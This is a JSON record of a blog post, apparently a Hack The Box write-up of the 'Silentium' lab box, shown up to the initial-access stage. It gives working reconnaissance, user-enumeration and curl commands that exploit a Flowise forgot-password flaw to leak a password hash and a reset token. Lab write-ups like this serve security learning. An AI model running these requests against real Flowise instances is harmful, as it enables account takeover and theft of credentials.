{
"$type": "site.standard.document",
"bskyPostRef": {
"cid": "bafyreiahczf4ck6rleacfuftx7qjz3z5o2samc4xfidssbuclcucvzee3i",
"uri": "at://did:plc:gc2nrf5j5b2po5huoyw6utr4/app.bsky.feed.post/3mjc4s3vusez2"
},
"coverImage": {
"$type": "blob",
"ref": {
"$link": "bafkreieezeqdwqu6g7wotmx7vg5zohksll7dn7yl7bv2pcpr4wqldnfsnm"
},
"mimeType": "image/jpeg",
"size": 111833
},
"description": "SUMMARY Silentium is an Easy Linux box hosting a corporate finance website and a staging Flowise AI platform behind a virtual host. The attack chain exploits three vulnerabilities. RECONNAISSANCE NMAP SCAN nmap -sC -sV -p 22,80 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 80/tcp open http nginx 1.24.0 (Ubuntu) |_http-title: Silentium | Institutional Capital & Lending Solutions Two ports open: SSH and HTTP. Port 80 serves an ngin...",
"path": "/hack-the-box-season-10-htb-silentium-writeup-easy-weekly-april-12th-2026/",
"publishedAt": "2026-04-12T08:00:00.000Z",
"site": "https://1337sheets.com",
"tags": [
],
"textContent": "## Summary\n\nSilentium is an Easy Linux box hosting a corporate finance website and a staging Flowise AI platform behind a virtual host. The attack chain exploits three vulnerabilities.\n\n* * *\n\n## Reconnaissance\n\n### Nmap Scan\n\n\n    nmap -sC -sV -p 22,80 <TARGET_IP>\n\n\n\n    PORT   STATE SERVICE VERSION\n    22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.15\n    80/tcp open  http    nginx 1.24.0 (Ubuntu)\n    |_http-title: Silentium | Institutional Capital & Lending Solutions\n\n\nTwo ports open: SSH and HTTP. Port 80 serves an nginx web server that redirects to `silentium.htb`.\n\n### Virtual Host Discovery\n\n\n    ffuf -u http://silentium.htb -H \"Host: FUZZ.silentium.htb\" \\\n      -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -ac\n\n\nDiscovered `staging.silentium.htb` (Status 200).\n\nAdded both hostnames to `/etc/hosts`:\n\n\n    <TARGET_IP> silentium.htb staging.silentium.htb\n\n\n* * *\n\n## Enumeration\n\n### silentium.htb - Main Site\n\nA static corporate website for \"Silentium International Asset Management\", an institutional finance firm. 
The team section lists:\n\n * **Marcus Thorne** - Managing Director\n * **Ben** - Head of Financial Systems\n * **Elena Rossi** - Chief Risk Officer\n\n\n\nThe name \"Ben\" with only a first name is notable as a potential username.\n\n### staging.silentium.htb - Flowise 3.0.5\n\nThe staging subdomain runs **Flowise 3.0.5**, an open-source AI agent builder platform.\n\n\n    curl -s http://staging.silentium.htb/api/v1/version\n    # {\"version\":\"3.0.5\"}\n\n\nMost API endpoints return `{\"error\":\"Unauthorized Access\"}`, confirming authentication is enabled.\n\n### User Enumeration\n\nThe Flowise login endpoint leaks whether a user exists via different error messages:\n\n\n    # Non-existent user returns 404\n    curl -s -X POST http://staging.silentium.htb/api/v1/auth/login \\\n      -H \"Content-Type: application/json\" \\\n      -d '{\"email\":\"admin@silentium.htb\",\"password\":\"test\"}'\n    # {\"statusCode\":404,\"message\":\"User Not Found\"}\n\n    # Valid user returns 401\n    curl -s -X POST http://staging.silentium.htb/api/v1/auth/login \\\n      -H \"Content-Type: application/json\" \\\n      -d '{\"email\":\"ben@silentium.htb\",\"password\":\"test\"}'\n    # {\"statusCode\":401,\"message\":\"Incorrect Email or Password\"}\n\n\n**Confirmed valid user**: `ben@silentium.htb`\n\n* * *\n\n## Initial Access\n\n### Step 1: GHSA-jc5m-wrp2-qq38 - PII Disclosure on Forgot Password\n\n**Vulnerability**: Flowise <= 3.0.12 exposes sensitive user data (bcrypt password hash and password reset token) in the response of the unauthenticated forgot-password endpoint.\n\n\n    curl -s -X POST \"http://staging.silentium.htb/api/v1/account/forgot-password\" \\\n      -H \"Content-Type: application/json\" \\\n      -d '{\"user\":{\"email\":\"ben@silentium.htb\"}}'\n\n\n**Response** (key fields):\n\n\n    {\n      \"user\": {\n        \"id\": \"<REDACTED_UUID>\",\n        \"name\": \"admin\",\n        \"email\": \"ben@silentium.htb\",\n        \"credential\": \"<REDACTED_BCRYPT_HASH>\",\n        \"tempToken\": \"<REDACTED_TOKEN>\",\n        \"tokenExpiry\": 
\"<REDACTED_TIMESTAMP>\",\n        \"status\": \"active\"\n      }\n    }\n\n\n**Leaked data**:\n\n * `credential` - bcrypt password hash (cost factor 5)\n * `tempToken` - password reset token (valid for 15 minutes)",
"title": "Hack The Box - Season 10 HTB Silentium Writeup - Easy- Weekly - April 12th, 2026",
"updatedAt": "2026-04-12T10:18:29.900Z"
}